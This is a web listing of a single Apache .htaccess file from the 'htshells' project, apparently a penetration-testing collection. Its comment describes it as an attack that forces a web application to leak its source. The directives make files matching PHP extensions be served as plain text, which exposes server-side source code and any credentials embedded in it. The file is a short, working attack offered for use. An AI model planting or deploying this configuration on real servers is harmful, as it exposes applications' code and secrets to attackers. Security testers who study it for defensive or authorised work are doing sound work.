0xBADCA7/htshells/master/info/mod_php.info.htaccess - Htaccess File

0xBADCA7/htshells/master/info/mod_php.info.htaccess

# Attack a web application by forcing it to leak source - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
    <FilesMatch ".ph.*$">
        SetHandler text/plain
        AddType text/plain .php
    </FilesMatch>

On Github License

Files

Download PDF of Htaccess file

Comments

Apache